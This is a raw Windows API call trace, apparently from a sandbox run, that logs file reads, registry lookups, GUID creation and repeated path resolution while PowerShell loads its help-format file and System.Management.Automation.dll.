	[0283.815] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.815] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.816] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.816] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.816] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.817] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.817] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.817] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.817] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.818] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.820] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.821] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.821] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.821] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.822] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.822] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.822] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.823] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.823] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.823] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.823] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.824] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.824] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.824] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.824] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.825] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.825] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.825] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.825] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.826] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.826] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.826] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.827] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.827] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.827] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.827] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.828] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.828] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.828] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.828] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0283.828] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0xf37, lpOverlapped=0x0) returned 1
	[0283.828] ReadFile (in: hFile=0x300, lpBuffer=0x2e9d107, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9d107*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0283.829] ReadFile (in: hFile=0x300, lpBuffer=0x2e9da68, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x2e9da68*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0283.829] CloseHandle (hObject=0x300) returned 1
	[0283.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.829] SetErrorMode (uMode=0x1) returned 0x1
	[0283.829] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0283.829] SetErrorMode (uMode=0x1) returned 0x1
	[0283.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.830] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x300) returned 0x0
	[0283.830] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0283.830] CoTaskMemAlloc (cb=0x5a) returned 0x271660
	[0283.830] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x271660, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0283.830] CoTaskMemFree (pv=0x271660) 
	[0283.830] RegCloseKey (hKey=0x300) returned 0x0
	[0283.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0283.846] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xcf0f59c7, Data2=0x154c, Data3=0x4e98, Data4=([0]=0x96, [1]=0x42, [2]=0x85, [3]=0x4f, [4]=0xd6, [5]=0xe2, [6]=0x94, [7]=0xf3))) returned 0x0
	[0283.846] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x57381517, Data2=0xfe09, Data3=0x4cf6, Data4=([0]=0x8a, [1]=0xf8, [2]=0xac, [3]=0x5d, [4]=0xb2, [5]=0x53, [6]=0x7b, [7]=0x84))) returned 0x0
	[0283.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0283.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.722] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xe00b844e, Data2=0x59f6, Data3=0x4952, Data4=([0]=0x9b, [1]=0xed, [2]=0x46, [3]=0x8a, [4]=0x56, [5]=0x15, [6]=0xa9, [7]=0x2d))) returned 0x0
	[0284.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.725] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.726] VirtualQuery (in: lpAddress=0x12b360, lpBuffer=0x12c220, dwLength=0x30 | out: lpBuffer=0x12c220*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.727] VirtualQuery (in: lpAddress=0x12b3f0, lpBuffer=0x12c2b0, dwLength=0x30 | out: lpBuffer=0x12c2b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0284.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0284.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
